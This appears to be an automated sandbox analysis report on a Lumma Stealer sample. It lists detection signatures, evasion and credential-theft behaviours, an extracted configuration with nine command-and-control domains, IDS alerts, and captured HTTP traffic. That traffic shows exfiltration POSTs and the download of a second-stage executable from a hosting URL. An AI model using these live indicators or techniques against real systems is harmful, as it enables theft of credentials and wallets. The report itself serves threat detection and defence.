Edit tour

Windows Analysis Report
NAnOVCOt4L.exe

Overview

General Information

Sample name:	NAnOVCOt4L.exe renamed because original name is a hash value
Original sample name:	352456d0fc286ccabe5d1ad2efc6ca5c.exe
Analysis ID:	1579978
MD5:	352456d0fc286ccabe5d1ad2efc6ca5c
SHA1:	982347b4bbbd0a09e0c2ce8016b69d414048d9fb
SHA256:	c5afbe8a6fa9ef50c2b543eb287c4862faa59edd18e51d7d4d65332f75c7e6ca
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

LummaC encrypted strings found

Machine Learning detection for sample

PE file contains section with special chars

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to detect virtual machines (STR)

Detected potential crypto function

Entry point lies outside standard sections

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

NAnOVCOt4L.exe (PID: 7008 cmdline: "C:\Users\user\Desktop\NAnOVCOt4L.exe" MD5: 352456D0FC286CCABE5D1AD2EFC6CA5C)

WerFault.exe (PID: 4456 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7008 -s 1804 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["observerfry.lat", "manyrestro.lat", "curverpluch.lat", "bashfulacid.lat", "tentabatte.lat", "talkynicer.lat", "wordyfindy.lat", "slipperyloo.lat", "shapestickyr.lat"], "Build id": "LOGS11--LiveTraffic"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
Process Memory Space: NAnOVCOt4L.exe PID: 7008	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: NAnOVCOt4L.exe PID: 7008	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: NAnOVCOt4L.exe PID: 7008	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Process Memory Space: NAnOVCOt4L.exe PID: 7008	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-23T17:30:00.902825+0100	2028371	3	Unknown Traffic	192.168.2.4	49730	172.67.199.72	443	TCP
2024-12-23T17:30:03.076475+0100	2028371	3	Unknown Traffic	192.168.2.4	49731	172.67.199.72	443	TCP
2024-12-23T17:30:05.452607+0100	2028371	3	Unknown Traffic	192.168.2.4	49732	172.67.199.72	443	TCP
2024-12-23T17:30:08.267298+0100	2028371	3	Unknown Traffic	192.168.2.4	49733	172.67.199.72	443	TCP
2024-12-23T17:30:11.137063+0100	2028371	3	Unknown Traffic	192.168.2.4	49734	172.67.199.72	443	TCP
2024-12-23T17:30:13.917098+0100	2028371	3	Unknown Traffic	192.168.2.4	49735	172.67.199.72	443	TCP
2024-12-23T17:30:16.434393+0100	2028371	3	Unknown Traffic	192.168.2.4	49736	172.67.199.72	443	TCP
2024-12-23T17:30:22.266344+0100	2028371	3	Unknown Traffic	192.168.2.4	49741	172.67.199.72	443	TCP
2024-12-23T17:30:24.917502+0100	2028371	3	Unknown Traffic	192.168.2.4	49743	185.166.143.50	443	TCP
2024-12-23T17:30:27.347005+0100	2028371	3	Unknown Traffic	192.168.2.4	49745	3.5.27.149	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-23T17:30:01.531143+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49730	172.67.199.72	443	TCP
2024-12-23T17:30:03.862185+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49731	172.67.199.72	443	TCP
2024-12-23T17:30:23.077616+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49741	172.67.199.72	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-23T17:30:01.531143+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49730	172.67.199.72	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-23T17:30:03.862185+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49731	172.67.199.72	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-23T17:30:14.696136+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49735	172.67.199.72	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: NAnOVCOt4L.exe

Avira: detected

Found malware configuration

Source: NAnOVCOt4L.exe.7008.0.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["observerfry.lat", "manyrestro.lat", "curverpluch.lat", "bashfulacid.lat", "tentabatte.lat", "talkynicer.lat", "wordyfindy.lat", "slipperyloo.lat", "shapestickyr.lat"], "Build id": "LOGS11--LiveTraffic"}

Multi AV Scanner detection for submitted file

Source: NAnOVCOt4L.exe

ReversingLabs: Detection: 63%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: NAnOVCOt4L.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000003.1699905344.00000000050D0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: bashfulacid.lat
Source: 00000000.00000003.1699905344.00000000050D0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: tentabatte.lat
Source: 00000000.00000003.1699905344.00000000050D0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: curverpluch.lat
Source: 00000000.00000003.1699905344.00000000050D0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: talkynicer.lat
Source: 00000000.00000003.1699905344.00000000050D0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: shapestickyr.lat
Source: 00000000.00000003.1699905344.00000000050D0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: manyrestro.lat
Source: 00000000.00000003.1699905344.00000000050D0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: slipperyloo.lat
Source: 00000000.00000003.1699905344.00000000050D0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: wordyfindy.lat
Source: 00000000.00000003.1699905344.00000000050D0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: observerfry.lat
Source: 00000000.00000003.1699905344.00000000050D0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.1699905344.00000000050D0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.1699905344.00000000050D0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000003.1699905344.00000000050D0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.1699905344.00000000050D0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000003.1699905344.00000000050D0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: LOGS11--LiveTraffic

Source: NAnOVCOt4L.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.5.27.149:443 -> 192.168.2.4:49745 version: TLS 1.2

Source: C:\Users\user\Desktop\NAnOVCOt4L.exe

Directory queried: number of queries: 1001

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 172.67.199.72:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 172.67.199.72:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49735 -> 172.67.199.72:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 172.67.199.72:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 172.67.199.72:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49741 -> 172.67.199.72:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: observerfry.lat
Source: Malware configuration extractor	URLs: manyrestro.lat
Source: Malware configuration extractor	URLs: curverpluch.lat
Source: Malware configuration extractor	URLs: bashfulacid.lat
Source: Malware configuration extractor	URLs: tentabatte.lat
Source: Malware configuration extractor	URLs: talkynicer.lat
Source: Malware configuration extractor	URLs: wordyfindy.lat
Source: Malware configuration extractor	URLs: slipperyloo.lat
Source: Malware configuration extractor	URLs: shapestickyr.lat

Source: Joe Sandbox View	IP Address: 172.67.199.72 172.67.199.72
Source: Joe Sandbox View	IP Address: 185.166.143.50 185.166.143.50

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 172.67.199.72:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 172.67.199.72:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 172.67.199.72:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 172.67.199.72:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 3.5.27.149:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 172.67.199.72:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 172.67.199.72:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 185.166.143.50:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 172.67.199.72:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 172.67.199.72:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: observerfry.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: observerfry.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Q8A7M9HT8VACM2BVCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18163Host: observerfry.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1O2WZCWELESOAQNOSBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8790Host: observerfry.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5J1M98U4MYKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20401Host: observerfry.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=W2O9E9SV6Z10L1QQ14QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1277Host: observerfry.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=W2NW3P8BHSQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 587732Host: observerfry.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 88Host: observerfry.lat
Source: global traffic	HTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bitbucket.org
Source: global traffic	HTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNPCIKNTEK&Signature=NPkElaCIUra%2B8CY2WTSMaYA38rA%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBEaCXVzLWVhc3QtMSJGMEQCIBPwktU7vwx5ZkBAAYg9LY6DCDw%2BpdcEq%2FSybok0mFOWAiBp8ugOQPLS5ACZQ0eTcEa8GCUh%2FWp5YOXEDMo2EuvuFyqwAgja%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMJ%2B29cHRcGcGCbaH4KoQCEYYcB0oYVr9KvTmSfqMdrA8f8ZhXQBhDiXC9Lhou4UAHflo7HJJ0qqJaAvFQ89tSJV%2B7no6eUg9U6xG5hgTXZZzSXtZYaqTdxNbfKYiqL4zkoEeileC70XlxUFY1X82eJXK%2BpiN28pRvStVT1935IbT4YnNERLSjTV%2BMOkkbcu4dZCcGbnEOJBrufoZyTqh3IRYGOsBAwCTbJ2tE4XbfSLs9c6P5WiaswNTwuYTEqeWPDeAGAeQwXePmHm%2FVuodrWeXwmk2%2B6ZKJsVPQUU46HfIoIL6FjLv2CGbbV%2FNX5V9KVIh%2Begp0Q4rNYXCpozekYprZ70CI%2FPtse5JwVk8gyJXObI4wup6muwY6ngHSL3ALC5Tv4krbVPk327Pxc31%2F47CucLuq9ZtjWZP6vcokZXGAhVvN8qPrvbr%2FsaDVknYNIPZn5c7%2B%2B8TnOfmVHZMxoeQ%2BrslSYbsokKnlORCBuQH6sGSNBcI%2FJeVjhb7XTZKwzGoudszoePal57Z5Vdwy6GSjEVcK2Px3QDzjPDFhu%2FmsStCC9vH9o5b7BMzl6GRmjZ80yDYVTh88Gg%3D%3D&Expires=1734972994 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bitbucket.org
Source: global traffic	HTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNPCIKNTEK&Signature=NPkElaCIUra%2B8CY2WTSMaYA38rA%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBEaCXVzLWVhc3QtMSJGMEQCIBPwktU7vwx5ZkBAAYg9LY6DCDw%2BpdcEq%2FSybok0mFOWAiBp8ugOQPLS5ACZQ0eTcEa8GCUh%2FWp5YOXEDMo2EuvuFyqwAgja%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMJ%2B29cHRcGcGCbaH4KoQCEYYcB0oYVr9KvTmSfqMdrA8f8ZhXQBhDiXC9Lhou4UAHflo7HJJ0qqJaAvFQ89tSJV%2B7no6eUg9U6xG5hgTXZZzSXtZYaqTdxNbfKYiqL4zkoEeileC70XlxUFY1X82eJXK%2BpiN28pRvStVT1935IbT4YnNERLSjTV%2BMOkkbcu4dZCcGbnEOJBrufoZyTqh3IRYGOsBAwCTbJ2tE4XbfSLs9c6P5WiaswNTwuYTEqeWPDeAGAeQwXePmHm%2FVuodrWeXwmk2%2B6ZKJsVPQUU46HfIoIL6FjLv2CGbbV%2FNX5V9KVIh%2Begp0Q4rNYXCpozekYprZ70CI%2FPtse5JwVk8gyJXObI4wup6muwY6ngHSL3ALC5Tv4krbVPk327Pxc31%2F47CucLuq9ZtjWZP6vcokZXGAhVvN8qPrvbr%2FsaDVknYNIPZn5c7%2B%2B8TnOfmVHZMxoeQ%2BrslSYbsokKnlORCBuQH6sGSNBcI%2FJeVjhb7XTZKwzGoudszoePal57Z5Vdwy6GSjEVcK2Px3QDzjPDFhu%2FmsStCC9vH9o5b7BMzl6GRmjZ80yDYVTh88Gg%3D%3D&Expires=1734972994 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com

Source: global traffic	DNS traffic detected: DNS query: observerfry.lat
Source: global traffic	DNS traffic detected: DNS query: bitbucket.org
Source: global traffic	DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: observerfry.lat

Source: NAnOVCOt4L.exe, NAnOVCOt4L.exe, 00000000.00000003.2019808994.0000000001528000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1993065242.000000000151B000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1993286912.000000000151D000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000002.2378096531.0000000001529000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe
Source: NAnOVCOt4L.exe, 00000000.00000003.2019808994.0000000001528000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1993065242.000000000151B000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1993286912.000000000151D000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000002.2378096531.0000000001529000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exeer6
Source: NAnOVCOt4L.exe, 00000000.00000003.2019808994.0000000001528000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000002.2378096531.0000000001529000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.2019756477.0000000005C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: NAnOVCOt4L.exe, 00000000.00000003.1803117494.0000000005BE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: NAnOVCOt4L.exe, 00000000.00000003.1803117494.0000000005BE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: NAnOVCOt4L.exe, 00000000.00000003.2019756477.0000000005C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: NAnOVCOt4L.exe, 00000000.00000003.2019808994.0000000001528000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000002.2378096531.0000000001529000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.2019756477.0000000005C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: NAnOVCOt4L.exe, 00000000.00000002.2380246394.0000000005C58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: NAnOVCOt4L.exe, 00000000.00000003.2019808994.0000000001528000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000002.2378096531.0000000001529000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.2019756477.0000000005C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: NAnOVCOt4L.exe, 00000000.00000003.1803117494.0000000005BE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: NAnOVCOt4L.exe, 00000000.00000003.2019808994.0000000001528000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000002.2378096531.0000000001529000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.2019756477.0000000005C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: NAnOVCOt4L.exe, 00000000.00000003.1803117494.0000000005BE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: NAnOVCOt4L.exe, 00000000.00000003.1803117494.0000000005BE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: NAnOVCOt4L.exe, 00000000.00000003.2019808994.0000000001528000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000002.2378096531.0000000001529000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.2019756477.0000000005C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: NAnOVCOt4L.exe, 00000000.00000003.1803117494.0000000005BE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: NAnOVCOt4L.exe, 00000000.00000003.1803117494.0000000005BE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: NAnOVCOt4L.exe, 00000000.00000003.1746996120.000000000150A000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1832109571.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1854093448.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1746946437.00000000014FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://microsoft.co
Source: NAnOVCOt4L.exe, 00000000.00000002.2380599032.00000000062A9000.00000002.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1992754302.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: NAnOVCOt4L.exe, 00000000.00000003.1803117494.0000000005BE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
